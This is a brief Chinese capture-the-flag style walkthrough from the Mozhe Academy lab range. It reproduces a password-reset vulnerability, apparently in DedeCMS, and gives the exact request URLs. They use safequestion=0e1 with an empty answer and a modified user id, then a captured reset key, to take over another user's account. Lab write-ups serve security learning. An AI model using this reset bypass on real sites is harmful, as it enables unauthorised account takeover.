漏洞复现
靶场墨者学院
开始
用工具扫描出/member/login.php和/dede/login.php路径
会员页面
管理页面
根据解题思路,那么先创建一个账号111(发现还有test和admin用户)
判断admin用户是管理员,发现并不能登录会员页面这个admin用户。
那就尝试登录test看看,尝试修改密码
这里修改id的值即可修改对应的用户的密码,admin用户id=1,test用户id=2
/member/resetpassword.php?dopost=safequestion&safequestion=0e1&safeanwser=&id=2
用brup进行抓包,可以获取到重制密码的链接
修改为
http://124.70.71.251:40338/member/resetpassword.php?dopost=getpasswd&id=2&key=ZIvUJGYG
登录进去
找了很久,最后网上找到原来邮箱是密码
发现key